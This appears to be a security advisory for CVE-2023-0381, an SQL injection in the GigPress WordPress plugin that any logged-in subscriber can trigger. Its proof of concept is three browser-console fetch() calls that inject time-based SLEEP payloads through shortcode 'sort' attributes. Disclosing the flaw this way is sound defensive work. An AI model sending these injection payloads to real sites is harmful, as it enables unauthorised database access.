GigPress <= 2.3.28 – Subscriber+ SQLi | CVE 2023-0381

Description

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks

Proof of Concept

Run the below commands in the developer console of the web browser while being on the blog as a subscriber user and note the delayed responses

Via gigpress_menu shortcode, 5s delay

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[gigpress_menu sort=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));


Via gigpress_shows shortcode, 3s delay

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[gigpress_shows group_artists='no' sort=' AND (SELECT 42 FROM (SELECT(SLEEP(1)))b)']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));


Via gigpress_related_shows shortcode, 6s delay:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&post_ID=1&shortcode=[gigpress_related_shows sort=' AND (SELECT 42 FROM (SELECT(SLEEP(2)))b)']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));